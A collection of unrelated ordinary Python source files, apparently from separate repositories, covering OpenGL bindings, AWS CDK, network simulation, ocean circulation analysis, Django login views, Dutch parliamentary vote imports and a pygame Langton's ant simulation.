and/or use them on all of the objects in a scene rather than just a select
few.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/AMD/compressed_3DC_texture.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.AMD.compressed_3DC_texture import *
from OpenGL.raw.GLES2.AMD.compressed_3DC_texture import _EXTENSION_NAME
def glInitCompressed3DcTextureAMD():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
|
MOD = 10**9+7
def valueFromList(head):
value = 0
current_node = head
while current_node:
value = (value * 10) + current_node.data
current_node = current_node.next
return value
def multiplyTwoList(head1, head2):
val1 = valueFromList(head1)
val2 = valueFromList(head2)
return (val1*val2) % MOD
|
import pathlib
from aws_cdk import aws_apigatewayv2_alpha as apigatewayv2_alpha
from aws_cdk import (
aws_apigatewayv2_integrations_alpha as apigatewayv2_integrations_alpha,
)
from aws_cdk import aws_lambda as lambda_
from aws_cdk import aws_lambda_python_alpha as lambda_python_alpha
from constructs import Construct
class Api(Construct):
def __init__(self, scope: Construct, id_: str) -> None:
super().__init__(scope, id_)
self.lambda_function = lambda_python_alpha.PythonFunction(
self,
"LambdaFunction",
runtime=lambda_.Runtime.PYTHON_3_7,
entry=str(pathlib.Path(__file__).parent.joinpath("runtime").resolve()),
index="lambda_function.py",
handler="lambda_handler",
)
api_gateway_http_lambda_integration = (
apigatewayv2_integrations_alpha.HttpLambdaIntegration(
"ApiGatewayHttpLambdaIntegration", handler=self.lambda_function
)
)
self.api_gateway_http_api = apigatewayv2_alpha.HttpApi(
self,
"ApiGatewayHttpApi",
default_integration=api_gateway_http_lambda_integration,
)
|
# optimizer
optimizer = dict(type='SGD', lr=30, momentum=0.9, weight_decay=0.0)
# learning policy
lr_config = dict(policy='CosineAnnealing', min_lr=0.)
# runtime settings
runner = dict(type='EpochBasedRunner', max_epochs=100)
|
# -*- coding: utf-8 -*-
"""
Tested
Works
"""
import camera
import crop
import imageWorker as iW
import cv2
import math
def camCalib():
# #LIVE
# #Connect to camera
cam = camera.camera()
cam.cameraOn()
#Create image worker
imgWork = iW.ImgWorker()
print("La bordet kun inneholde sjakkbrettet")
input("Trykk enter når du er klar")
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
print("Sett ut en brikke, tast inn x verdi og y verdi fra flexpedant")
i1=input("x,y: ")
i1 = tuple(float(x) for x in i1.split(","))
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
_, i1_p = imgWork.getFromTo() # _ er bildet som vi ikke trenger her
print(i1_p)
print("Sett ut en brikke til, tast inn x verdi og y verdi fra flexpedant")
i2=input("x,y: ")
i2 = tuple(float(x) for x in i2.split(","))
im = cam.takeImage() #take image
imgWork.addImg(iW.Image(im)) #add image to the worker
_,i2_p = imgWork.getFromTo()
cam.cameraOff()
P1=[i1[0],i1[1]]
p1=[i1_p[0][0],i1_p[0][1]]
P2=[i2[0],i2[1]]
p2=[i2_p[0][0],i2_p[0][1]]
print(P1)
print(P2)
print(p1)
print(p2)
y=math.sqrt((p2[0]-p1[0])**2+(p2[1]-p1[1])**2)
Y=math.sqrt((P2[0]-P1[0])**2+(P2[1]-P1[1])**2)
mm = Y/y
x0=P1[0]-p1[0]*mm
y0=P1[1]-p1[1]*mm
# print(x)
return mm, p1
if __name__ == "__main__":
print(camCalib())
# P1[xxx,yyy]
# p1[rrr,uuu]
# mm = 0.3
|
import ns.core
import numpy as np
from src.simulator.internet.communicator import Communicator
from collections import OrderedDict
CHECK_TIME_SLOT = 0.0001
DEFAULT_TIME_SLOT = 0.1
DEFAULT_OFFLINE_NUMBER = 0
MAX_BLOCK_DURATION = 9999999999999
BASE_PORT = 5000
class DecentralizedConsensus:
def __init__(self, model_size, ps_node_container, matrix, data_rate=1e9, packet_size=536,
protocol='tcp', port=9, verbose=False, offline_params={}, max_block_duration=None):
assert protocol in ['tcp', 'udp']
assert ps_node_container.GetN() == len(matrix)
self.ps_node_container = ps_node_container
self.model_size = model_size
self.matrix = matrix # np.ndarray
self.data_rate = data_rate
self.packet_size = packet_size
self.protocol = protocol
self.port = port
self.node_num = self.ps_node_container.GetN()
self.verbose = verbose
self.offline_params = offline_params
# self.sender_receiver_matrix = None
self._time_consuming = 0
self.communicator_list = None
self.global_comm_matrix_list = None
self.max_block_duration = max_block_duration if max_block_duration is not None else MAX_BLOCK_DURATION
def __del__(self):
self.reset()
def reset(self):
self._time_consuming = 0
for communicator in self.communicator_list:
communicator.reset()
def get_time_consuming(self):
return self._time_consuming
def init_app(self, start_time=0, stop_time=None, phases=1):
# source node src (ps_node_container.Get(src)) will send data to
# sink node dst (ps_node_container.Get(dst)) with "src+BASE_PORT" port listened
self.global_comm_matrix_list = [np.zeros((self.node_num, self.node_num), dtype=int) for _ in range(phases)]
self.communicator_list = [Communicator(self.ps_node_container.Get(i), i, self.offline_params,
self.protocol, self.verbose, self.global_comm_matrix_list)
for i in range(self.node_num)]
self.sender_receiver_matrix = [[None for _ in range(self.node_num)] for _ in range(self.node_num)]
for src in range(self.node_num):
for dst in range(self.node_num):
if src != dst and self.matrix[src, dst] > 0:
if self.verbose:
print("Mixing model: PS %d -> PS %d" % (src, dst))
app_receiver = self.communicator_list[dst].add_app_receiver(src, self.model_size, phases, src+BASE_PORT,
start_time, stop_time)
dst_node = self.ps_node_container.Get(dst)
app_sender = self.communicator_list[src].add_app_sender(dst, dst_node, self.model_size, phases, src+BASE_PORT,
self.packet_size, self.data_rate,
start_time, stop_time)
self.communicator_list[dst].associate_upstream_app_sender(src, app_sender)
# self.sender_receiver_matrix[src][dst] = (app_sender, app_receiver)
def is_finished(self):
communicator_states = [communicator.is_finished() for communicator in self.communicator_list]
return np.all(communicator_states)
def offline_thread(self):
# recover the nodes offline in the last time slot
online_comms = [self.communicator_list[i] for i in range(len(self.communicator_list)) if
self.communicator_list[i].is_offline()]
online_comm_ids = [comm.get_id() for comm in online_comms]
# decide the nodes offline in this time slot
offline_comms = np.random.choice(self.communicator_list,
int(self.offline_params.get("number", DEFAULT_OFFLINE_NUMBER)), replace=False)
offline_comm_ids = [comm.get_id() for comm in offline_comms]
print(offline_comm_ids)
# take out the nodes which will keep offline in this slot
online_comms = [self.communicator_list[i] for i in online_comm_ids if i not in offline_comm_ids]
online_comm_ids = [comm.get_id() for comm in online_comms]
if self.verbose:
print("\n---------------------------------------------------------------------------")
print("[offline] At time %.6f %d nodes are:" % (ns.core.Simulator.Now().GetSeconds(), len(offline_comms)),
offline_comm_ids)
print("[online] At time %.6f %d nodes are:" % (ns.core.Simulator.Now().GetSeconds(), len(online_comms)),
online_comm_ids)
for i in range(len(offline_comms)):
offline_comms[i].offline_operation()
for i in range(len(online_comms)):
online_comms[i].online_operation()
online_comms[i].send_message()
online_comms[i].inform_upstream_send_message()
if not self.is_finished():
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(self.offline_params.get("time_slot", DEFAULT_TIME_SLOT))),
self.offline_thread)
def is_blocked_by(self, comm_x, comm_y):
if self.matrix[comm_y.get_id(), comm_x.get_id()] <= 0:
return False
lagging_list = comm_x.get_lagging_communicator_ids()
if len(lagging_list) == 1 and lagging_list[0] == comm_y.get_id():
return True
else:
return False
def unblock_thread(self):
for src, communicator_y in enumerate(self.communicator_list):
if communicator_y.is_offline():
dst_list = [dst for dst in self.matrix[communicator_y.get_id(), :].nonzero()[0] if dst != communicator_y.get_id()]
for dst in dst_list:
communicator_x = self.communicator_list[dst]
if self.is_blocked_by(communicator_x, communicator_y):
if self.verbose:
print("Node %d was blocked by node %d" % (communicator_x.get_id(), communicator_y.get_id()))
# unblock the online communicator y if exceeding maximum block duration
if ns.core.Simulator.Now().GetSeconds() - communicator_x.get_current_time() > self.max_block_duration:
ignoring_phase = communicator_x.abandon_data_from(communicator_y)
if ignoring_phase is not None:
_ = communicator_y.abandon_data_from(communicator_x, ignoring_phase)
# if self.verbose:
# print("Node %d would not receive data from node %d in %d-th phase"
# % (communicator_x.get_id(), communicator_y.get_id(), ignoring_phase))
if len(dst_list) == 0:
src_list = self.matrix[:, communicator_y.get_id()].nonzero()[0]
for src in src_list:
communicator_x = self.communicator_list[src]
if ns.core.Simulator.Now().GetSeconds() - communicator_x.get_current_time() > self.max_block_duration:
ignoring_phase = communicator_y.abandon_data_from(communicator_x)
if not self.is_finished():
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(CHECK_TIME_SLOT)), self.unblock_thread)
def run(self, start_time, stop_time, phases=1):
self.init_app(start_time, stop_time, phases)
# any communicator may be offline in the initial phase
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.offline_thread)
for i in range(len(self.communicator_list)):
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.communicator_list[i].send_message)
# dynamically check whether any node are blocked by offline nodes
ns.core.Simulator.Schedule(ns.core.Time(ns.core.Seconds(start_time)), self.unblock_thread)
start_of_simulation = ns.core.Simulator.Now().GetSeconds() + start_time
ns.core.Simulator.Run()
# TODO: get last received time ?
end_of_simulation = max([communicator.get_current_time() for communicator in self.communicator_list])
if self.is_finished():
self._time_consuming = end_of_simulation - start_of_simulation
else:
self._time_consuming = -1
# print(self.get_comm_matrix_list())
return self._time_consuming
def get_comm_matrix_list(self):
rs = []
c=0
for comm_matrix in self.global_comm_matrix_list:
matrix = comm_matrix.copy()
for i in range(self.node_num):
for j in range(i, self.node_num):
if i == j:
matrix[i, j] = 1
elif matrix[i, j] != matrix[j, i]:
matrix[i, j] = matrix[j, i] = 0
w_matrix = np.zeros_like(matrix, dtype=float)
for i in range(self.node_num):
for j in range(self.node_num):
if i != j and matrix[i, j] > 0:
w_matrix[i, j] = 1 / (max(sum(matrix[:, i]), sum(matrix[:, j])))
w_matrix[i, i] = 1 - w_matrix[i].sum()
W = w_matrix - np.ones_like(w_matrix) / self.node_num
eigen, _ = np.linalg.eig(np.matmul(W, W.T))
p = 1 - np.max(eigen)
tmp = {}
tmp['comm'] = comm_matrix.tolist()
tmp['weight'] = w_matrix.tolist()
tmp['p'] = float(p)
rs.append(tmp)
c+=1
return rs
# def laplace(self, matrix):
# node_num = len(matrix)
# for i in range(node_num):
# for j in range(node_num):
# if i == j:
# matrix[i, j] = 1
#
# w_matrix = np.zeros_like(matrix, dtype=np.float32)
# matrix_sum = matrix.sum(1)
# for i in range(node_num):
# w_matrix[i, i] = matrix_sum[i]
# laplace_matrix = w_matrix - matrix
#
# max_alpha = 1 / laplace_matrix.max()
# w_matrix = np.identity(node_num) - laplace_matrix * max_alpha
# max_p = 1 - np.linalg.norm(w_matrix - 1 / node_num, ord=2) ** 2
# for alpha in np.arange(0, max_alpha, 0.01):
# tmp = np.identity(node_num) - laplace_matrix * alpha
# p = 1 - np.linalg.norm(tmp - 1 / node_num, ord=2) ** 2
# if p > max_p:
# max_p = p
# w_matrix = tmp
# return w_matrix
|
import tensorflow as tf
import os
##############################################################################
# Load model
##############################################################################
ROOT_DIR = os.getcwd()
# Model Directory
MODEL_DIR = "/datasets/models/mrcnn/fullstack_fullnetwork/chips20200326T0339/"
DEFAULT_WEIGHTS = "/datasets/models/mrcnn/fullstack_fullnetwork/chips20200326T0339/mask_rcnn_chips_0030.h5"
if __name__ == "__main__":
model_dir = os.path.join(ROOT_DIR, "Model")
export_path = os.path.join(model_dir, "mask_rcnn_chips_builder_no_sign")
with tf.Session(graph=tf.Graph()) as sess:
tf.saved_model.loader.load(sess, ["chips"], export_path)
graph = tf.get_default_graph()
# print(graph.get_operations())
sess.run()
|
from django.contrib.auth import login
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
from rest_framework import permissions, status
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from social.apps.django_app.utils import strategy, load_strategy
from clothstream.rest_auth.serializers import LoginSerializer
from clothstream.social_fb import api as social_fb_api
from django.contrib.auth import logout
@csrf_exempt
@api_view(['POST'])
@permission_classes((permissions.IsAuthenticated,))
def user_logout(request):
logout(request)
return Response()
@csrf_exempt
@api_view(['POST'])
@permission_classes((permissions.AllowAny,))
@strategy()
def register_by_access_token(request, backend):
access_token = request.DATA.get('access_token', None)
if not access_token:
return Response("missing access_token", status=400)
try:
user = request.strategy.backend.do_auth(access_token=access_token)
except Exception as err:
return Response(str(err), status=400)
if user:
social_fb_api.enrich_via_facebook(user)
strategy = load_strategy(request=request, backend=backend)
login(strategy.request, user)
serializer = LoginSerializer(instance=user, context={'request': request})
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response("Bad Credentials", status=403)
@ensure_csrf_cookie
@api_view(['GET'])
@permission_classes((permissions.AllowAny,))
def get_csrf_cookie(request):
""" we serve index.html as static file, single-page app must get csrf cookie prior to login, this is how
"""
return Response()
|
# -*- coding: utf-8 -*-
from formalchemy.tests import *
def test_renderer_names():
"""
Check that the input name take care of multiple primary keys::
>>> fs = FieldSet(primary1)
>>> print(fs.field.render())
<input id="PrimaryKeys-1_22-field" maxlength="10" name="PrimaryKeys-1_22-field" type="text" value="value1" />
>>> fs = FieldSet(primary2)
>>> print(fs.field.render())
<input id="PrimaryKeys-1_33-field" maxlength="10" name="PrimaryKeys-1_33-field" type="text" value="value2" />
Check form rendering with keys::
>>> fs = FieldSet(primary2)
>>> fs.configure(pk=True)
>>> print(fs.render())
<div>
<label class="field_req" for="PrimaryKeys-1_33-id">
Id
</label>
<input id="PrimaryKeys-1_33-id" name="PrimaryKeys-1_33-id" type="text" value="1" />
</div>
<script type="text/javascript">
//<![CDATA[
document.getElementById("PrimaryKeys-1_33-id").focus();
//]]>
</script>
<div>
<label class="field_req" for="PrimaryKeys-1_33-id2">
Id2
</label>
<input id="PrimaryKeys-1_33-id2" maxlength="10" name="PrimaryKeys-1_33-id2" type="text" value="33" />
</div>
<div>
<label class="field_req" for="PrimaryKeys-1_33-field">
Field
</label>
<input id="PrimaryKeys-1_33-field" maxlength="10" name="PrimaryKeys-1_33-field" type="text" value="value2" />
</div>
"""
def test_foreign_keys():
"""
Assume that we can have more than one ForeignKey as primary key::
>>> fs = FieldSet(orderuser2)
>>> fs.configure(pk=True)
>>> print(pretty_html(fs.user.render()))
<select id="OrderUser-1_2-user_id" name="OrderUser-1_2-user_id">
<option selected="selected" value="1">
Bill
</option>
<option value="2">
John
</option>
</select>
>>> print(pretty_html(fs.order.render()))
<select id="OrderUser-1_2-order_id" name="OrderUser-1_2-order_id">
<option value="1">
Quantity: 10
</option>
<option selected="selected" value="2">
Quantity: 5
</option>
<option value="3">
Quantity: 6
</option>
</select>
"""
def test_deserialize():
"""
Assume that we can deserialize a value
"""
fs = FieldSet(primary1, data={'PrimaryKeys-1_22-field':'new_value'})
assert fs.validate() is True
assert fs.field.value == 'new_value'
fs.sync()
session.rollback()
def test_deserialize_new_record():
"""
Assume that we can deserialize a value
"""
fs = FieldSet(PrimaryKeys(), data={'PrimaryKeys-_-id':'8',
'PrimaryKeys-_-id2':'9'})
fs.configure(include=[fs.id, fs.id2])
assert fs.validate() is True
fs.sync()
assert fs.model.id == 8, fs.model.id
assert fs.model.id2 == '9', fs.model.id2
session.rollback()
|
import asyncio
class Pauser:
"""
A helper class to provide pause / resume functionality to other classes.
"""
def __init__(self) -> None:
self._paused = False
self._resumed = asyncio.Event()
@property
def is_paused(self) -> bool:
"""
Return ``True`` if the state of managed operation is paused, otherwise ``False``.
"""
return self._paused
def pause(self) -> None:
"""
Pause the managed operation.
"""
if self._paused:
raise RuntimeError(
"Invalid action. Can not pause an operation that is already paused."
)
self._paused = True
def resume(self) -> None:
"""
Resume the operation.
"""
if not self._paused:
raise RuntimeError("Invalid action. Can not resume operation that isn't paused.")
self._paused = False
self._resumed.set()
async def await_resume(self) -> None:
"""
Await until ``resume()`` is called. Throw if called when the operation is not paused.
"""
if not self._paused:
raise RuntimeError("Can not await resume on operation that isn't paused.")
await self._resumed.wait()
self._resumed.clear()
|
import attr
from cortexpy.constants import EdgeTraversalOrientation
@attr.s(slots=True)
class OrientedGraphFuncs(object):
graph = attr.ib()
orientation = attr.ib()
color = attr.ib(None)
edges = attr.ib(init=False)
other_edge_node = attr.ib(init=False)
def __attrs_post_init__(self):
assert self.orientation in EdgeTraversalOrientation
if self.orientation == EdgeTraversalOrientation.original:
self.edges = self.graph.out_edges
self.other_edge_node = lambda edge: edge[1]
else:
self.edges = self.graph.in_edges
self.other_edge_node = lambda edge: edge[0]
|
"""Policy package"""
from KID.policy.base_policy import BasePolicy
from KID.policy.kid_policy import KIDPolicy
__all__ = [
'BasePolicy',
'KIDPolicy',
]
|
from vtkplotter import Cube, Text, show, collection
from vtkplotter.settings import fonts
Text("List of available fonts:")
Cube().c('white').rotateX(20).rotateZ(20)
for i, f in enumerate(fonts):
Text(f+': The quick fox jumps over the lazy dog.',
pos=(5,i*40+20), font=f, c=i%3)
show(collection(), axes=False)
|
class Solution:
def solve(self, n, m):
if n%2==0:
return m*(n//2)
if m%2==0:
return n*(m//2)
return ((n-1)//2)*m + (m-1)//2
|
import os
import xgcm
import dask
import numpy as np
import xarray as xr
import pop_tools
import tqdm.notebook as tqdm_notebook
import matplotlib.pyplot as plt
from grid import create_tdepth, find_array_idx
from paths import file_ex_ocn_ctrl, path_prace
from xr_DataArrays import xr_DZ, xr_DXU, xr_DZ_xgcm
from xhistogram.xarray import histogram
def calculate_AMOC_sigma_z(domain, ds, fn=None):
""" calculate the AMOC in depth and density space """
assert domain in ['ocn', 'ocn_low']
for q in ['PD', 'VVEL', 'DXT', 'DYT', 'DXU', 'DYU', 'REGION_MASK']: assert q in ds
(grid, ds_) = pop_tools.to_xgcm_grid_dataset(ds)
ds_['DZU'] = xr_DZ_xgcm(domain=domain, grid='U')
metrics = {
('X'): ['DXT', 'DXU'], # X distances
('Y'): ['DYT', 'DYU'], # Y distances
('Z'): ['DZU'], # Z distances
}
coords = {
'X': {'center':'nlon_t', 'right':'nlon_u'},
'Y': {'center':'nlat_t', 'right':'nlat_u'},
'Z': {'center':'z_t', 'left':'z_w_top', 'right':'z_w_bot'}
}
grid = xgcm.Grid(ds_, metrics=metrics, coords=coords)
print('merged annual datasets do not convert to U/T-lat/lons')
if 'nlat' in ds_.VVEL.dims:
rn = {'nlat':'nlat_u', 'nlon':'nlon_u'}
ac = {'nlat_u':ds_.nlat_u, 'nlon_u':ds_.nlon_u}
ds_['VVEL'] = ds_.VVEL.rename(rn).assign_coords()
if 'nlat' in ds_.PD.dims:
rn = {'nlat':'nlat_t', 'nlon':'nlon_t'}
ac = {'nlat_t':ds_.nlat_t, 'nlon_t':ds_.nlon_t}
ds_['PD'] = ds_.PD.rename(rn).assign_coords(ac)
print('interpolating density to UU point')
ds_['PD'] = grid.interp(grid.interp(ds_['PD'], 'X'), 'Y')
print('interpolating REGION_MASK to UU point')
fn_MASK = f'{path_prace}/MOC/AMOC_MASK_uu_{domain}.nc'
if os.path.exists(fn_MASK):
AMOC_MASK_uu = xr.open_dataarray(fn_MASK)
else:
MASK_uu = grid.interp(grid.interp(ds_.REGION_MASK, 'Y'), 'X')
AMOC_MASK_uu = xr.DataArray(np.in1d(MASK_uu, [-12,6,7,8,9,11,12]).reshape(MASK_uu.shape),
dims=MASK_uu.dims, coords=MASK_uu.coords)
AMOC_MASK_uu.to_netcdf(fn_MASK)
print('AMOC(y,z); [cm^3/s] -> [Sv]')
AMOC_yz = (grid.integrate(grid.cumint(ds_.VVEL.where(AMOC_MASK_uu),'Z',boundary='fill'), 'X')/1e12)
# AMOC_yz = (ds_.VVEL*ds_.DZU*ds_.DXU).where(AMOC_MASK_uu).sum('nlon_u').cumsum('z_t')/1e12
AMOC_yz = AMOC_yz.rename({'z_w_top':'z_t'}).assign_coords({'z_t':ds.z_t})
AMOC_yz.name = 'AMOC(y,z)'
print('AMOC(sigma_0,z); [cm^3/s] -> [Sv]')
if int(ds_.PD.isel(z_t=0).mean().values)==0:
PD, PDbins = ds_.PD*1000, np.arange(-10,7,.05)
if int(ds_.PD.isel(z_t=0).mean().values)==1:
PD, PDbins = (ds_.PD-1)*1000, np.arange(5,33,.05)
print('histogram')
weights = ds_.VVEL.where(AMOC_MASK_uu)*ds_.DZU*ds_.DXU/1e12
# ds_.PD.isel(z_t=0).plot()
AMOC_sz = histogram(PD, bins=[PDbins], dim=['z_t'],
weights=weights).sum('nlon_u', skipna=True).cumsum('PD_bin').T
AMOC_sz.name = 'AMOC(y,PD)'
# output to file
if fn is not None: xr.merge([AMOC_yz,AMOC_sz]).to_netcdf(fn)
return AMOC_yz, AMOC_sz
def calculate_MOC(ds, DXU, DZU, MASK):
""" Atlantic Meridional Overturning circulation
input:
ds .. xr Dataset of CESM output
output:
MOC .. 2D xr DataArray
"""
assert 'VVEL' in ds
MOC = (ds.VVEL*DXU*DZU).where(MASK).sum(dim='nlon')/1e2 # [m^3/s]
for k in np.arange(1,42):
MOC[k,:] += MOC[k-1,:]
return MOC
def approx_lats(domain):
""" array of approx. latitudes for ocean """
assert domain in ['ocn', 'ocn_low']
if domain=='ocn':
ds = xr.open_dataset(file_ex_ocn_ctrl, decode_times=False)
lats = ds.TLAT[:,900].copy()
lats[:120] = -78
elif domain=='ocn_low':
ds = xr.open_dataset(file_ex_ocn_lpd, decode_times=False)
lats = ds.TLAT[:,].copy()
return lats
def AMOC_max(AMOC):
""" AMOC maximum at 26 deg N, 1000 m """
lats = approx_lats('ocn')
tdepths = create_tdepth('ocn')
j26 = find_array_idx(lats, 26) # 1451
z1000 = find_array_idx(tdepths, 1000) # 21
return AMOC.isel({'z_t':z1000, 'nlat':j26})
def plot_AMOC(AMOC):
lats = approx_lats('ocn')
tdepths = create_tdepth('ocn')
j26 = find_array_idx(lats, 26)
z1000 = find_array_idx(tdepths, 1000)
return
|
import logging
from django.db import transaction
from wikidata import wikidata
from tkapi.util import queries
from tkapi.zaak import ZaakSoort
from tkapi.besluit import Besluit as TKBesluit
from person.util import parse_name_surname_initials
from person.models import Person
from parliament.models import ParliamentMember
from parliament.models import PoliticalParty
from document.models import Dossier
from document.models import Decision
from document.models import Kamerstuk
from document.models import Vote
from document.models import VoteIndividual
from document.models import VoteParty
from document.models import Voting
logger = logging.getLogger(__name__)
def clean_voting_results(voting_results, dossier_id):
""" Removes votings for other dossiers and duplicate controversial dossier votings """
voting_results_cleaned = []
for voting_result in voting_results:
if str(voting_result.get_dossier_id()) != str(dossier_id):
# this should only happen for controversial voting result lists, example: https://www.tweedekamer.nl/kamerstukken/stemmingsuitslagen/detail?id=2017P05310
logger.info('Voting for different dossier, remove voting')
continue
voting_results_cleaned.append(voting_result)
return voting_results_cleaned
class VotingFactory(object):
def __init__(self, do_create_missing_party=True):
self.vote_factory = VoteFactory(do_create_missing_party=do_create_missing_party)
@transaction.atomic
def create_votings(self, dossier_id):
logger.info('BEGIN')
logger.info('dossier id: ' + str(dossier_id))
dossier_id_main, dossier_id_sub = Dossier.split_dossier_id(dossier_id)
tk_besluiten = queries.get_dossier_besluiten_with_stemmingen(nummer=dossier_id_main, toevoeging=dossier_id_sub)
for tk_besluit in tk_besluiten:
self.create_votings_dossier_besluit(tk_besluit, dossier_id)
logger.info('END')
@transaction.atomic
def create_votings_dossier_besluit(self, tk_besluit: TKBesluit, dossier_id):
dossiers = Dossier.objects.filter(dossier_id=dossier_id)
assert dossiers.count() == 1
dossier = dossiers[0]
result = self.get_result_choice(tk_besluit.tekst)
zaak = tk_besluit.zaak
document_id = ''
if zaak.volgnummer:
document_id = str(dossier_id) + '-' + str(zaak.volgnummer)
is_dossier_voting = zaak.soort in [ZaakSoort.WETGEVING, ZaakSoort.INITIATIEF_WETGEVING, ZaakSoort.BEGROTING]
is_dossier_voting = is_dossier_voting or str(zaak.volgnummer) == '0'
logger.info('{} | dossier voting: {}'.format(document_id, is_dossier_voting))
voting_obj = Voting(
dossier=dossier,
decision=Decision.objects.filter(tk_id=tk_besluit.id).first(),
kamerstuk_raw_id=document_id,
result=result,
date=tk_besluit.agendapunt.activiteit.begin.date(), # TODO BR: replace with besluit date
source_url='',
is_dossier_voting=is_dossier_voting
)
kamerstukken = Kamerstuk.objects.filter(id_main=dossier_id, id_sub=zaak.volgnummer)
if kamerstukken.exists():
kamerstuk = kamerstukken[0]
voting_obj.kamerstuk = kamerstuk
# A voting can be postponed and later voted on
# we do not save the postponed voting if there is a newer voting
if kamerstuk.voting and kamerstuk.voting.date > voting_obj.date:
logger.info('newer voting for this kamerstuk already exits, skip this voting')
return
elif kamerstuk.voting:
kamerstuk.voting.delete()
elif not is_dossier_voting:
logger.error(
'Kamerstuk ' + document_id + ' not found in database. Kamerstuk is probably not yet published.')
voting_obj.is_individual = ('hoofdelijk' in tk_besluit.tekst.lower())
voting_obj.save()
if voting_obj.is_individual:
self.vote_factory.create_votes_individual(voting_obj, tk_besluit.stemmingen)
else:
self.vote_factory.create_votes_party(voting_obj, tk_besluit.stemmingen)
@staticmethod
def get_result_choice(result_string):
result_string = result_string.lower()
result_string.replace('.', '')
if 'aangenomen' in result_string or 'overeenkomstig' in result_string:
return Voting.AANGENOMEN
elif 'verworpen' in result_string:
return Voting.VERWORPEN
elif 'ingetrokken' in result_string:
return Voting.INGETROKKEN
elif 'aangehouden' in result_string or 'uitgesteld' in result_string:
return Voting.AANGEHOUDEN
elif 'controversieel verklaard' in result_string:
return Voting.CONTROVERSIEEL
logger.error('could not interpret the voting result: ' + result_string)
return Voting.ONBEKEND
class VoteFactory(object):
def __init__(self, do_create_missing_party=True):
self.do_create_missing_party = do_create_missing_party
@transaction.atomic
def create_votes_party(self, voting, stemmingen):
logger.info('BEGIN')
for stemming in stemmingen:
fractie_name = stemming.actor_fractie if stemming.actor_fractie else stemming.actor_naam
party = PoliticalParty.find_party(fractie_name)
if not party and self.do_create_missing_party:
party = self.create_missing_party(stemming)
if not stemming.soort:
logger.warning('vote has no decision, vote.details: ' + str(stemming.soort))
VoteParty.objects.create(
voting=voting,
party=party,
party_name=fractie_name,
number_of_seats=stemming.fractie_size,
decision=self.get_decision(stemming.soort),
details='',
is_mistake=stemming.vergissing if stemming.vergissing is not None else False
)
logger.info('END')
@staticmethod
def create_missing_party(stemming):
party_name = stemming.actor_naam # TODO: use fractie.naam (currently not available in TK API)
wikidata_id = wikidata.search_political_party_id(party_name, language='nl')
party = PoliticalParty.objects.create(
name=party_name,
# name_short=stemming.fractie.afkorting, # TODO: use fractie.afkorting (currently not available in TK API)
wikidata_id=wikidata_id
)
party.update_info(language='nl')
return party
@transaction.atomic
def create_votes_individual(self, voting, stemmingen):
logger.info('BEGIN')
for stemming in stemmingen:
persoon = stemming.persoon
parliament_member = None
persons = Person.objects.filter(tk_id=persoon.id)
if persons:
person = persons[0]
members = ParliamentMember.objects.filter(person=person).order_by('-joined')
parliament_member = members[0] if members.exists() else None
person_name = ' '.join([person.forename, person.surname, person.initials]).strip()
# TODO BR: this is a fallback, remove or extract function and log
if parliament_member is None:
if persoon:
initials = persoon.initialen
surname = persoon.achternaam
forname = persoon.roepnaam
else:
logger.error('Persoon not found for stemming: {}'.format(stemming.id))
surname_initials = stemming.json['AnnotatieActorNaam']
forname = ''
initials, surname, surname_prefix = parse_name_surname_initials(surname_initials)
parliament_member = ParliamentMember.find(surname=surname, initials=initials)
if not parliament_member:
logger.error('parliament member not found for vote: {}'.format(stemming.id))
logger.error('creating vote with empty parliament member')
person_name = ' '.join([forname, surname, initials]).strip()
VoteIndividual.objects.create(
voting=voting,
person_name=person_name,
person_tk_id=persoon.id,
parliament_member=parliament_member,
number_of_seats=1,
decision=self.get_decision(stemming.soort),
details='',
is_mistake=stemming.vergissing if stemming.vergissing is not None else False
)
logger.info('END')
@staticmethod
def get_decision(decision_string):
if 'Voor' == decision_string:
return Vote.FOR
elif 'Tegen' == decision_string:
return Vote.AGAINST
elif 'Niet deelgenomen' == decision_string:
return Vote.NONE
logger.error('no decision detected, returning Vote.NONE')
return Vote.NONE
|
import pygame
class Ant:
def __init__(self):
self.nodes = {}
self.node_size = 10
self.width = 1001
self.height = 1001
self.backg_color = (145,73,48)
self.pixel_color = (207,148,110)
self.ant_color = (0,0,0)
self.ant_start_x = 501/self.node_size
self.ant_start_y = 501/self.node_size
self.ant_x = self.ant_start_x
self.ant_y = self.ant_start_y
self.ant_dir = "up"
self.paused = True
self.screen = pygame.display.set_mode((self.width, self.height), pygame.HWSURFACE | pygame.DOUBLEBUF)
self.screen.fill(self.backg_color)
pygame.display.set_caption("Ant")
def init(self):
pygame.init()
self.font = pygame.font.SysFont("monospace", 15)
self.running = True
while self.running:
for event in pygame.event.get():
self.event(event)
self.update()
self.render()
self.cleanup()
def update(self):
killNode = None
createNode = None
if (self.ant_x, self.ant_y) in self.nodes:
if self.ant_dir == "up":
self.ant_dir = "left"
killNode = (self.ant_x, self.ant_y)
self.ant_x -= 1
elif self.ant_dir == "down":
self.ant_dir = "right"
killNode = (self.ant_x, self.ant_y)
self.ant_x += 1
elif self.ant_dir == "left":
self.ant_dir = "down"
killNode = (self.ant_x, self.ant_y)
self.ant_y += 1
elif self.ant_dir == "right":
self.ant_dir = "up"
killNode = (self.ant_x, self.ant_y)
self.ant_y -= 1
else:
if self.ant_dir == "up":
self.ant_dir = "right"
createNode = (self.ant_x, self.ant_y)
self.ant_x += 1
elif self.ant_dir == "down":
self.ant_dir = "left"
createNode = (self.ant_x, self.ant_y)
self.ant_x -= 1
elif self.ant_dir == "left":
self.ant_dir = "up"
createNode = (self.ant_x, self.ant_y)
self.ant_y -= 1
elif self.ant_dir == "right":
self.ant_dir = "down"
createNode = (self.ant_x, self.ant_y)
self.ant_y += 1
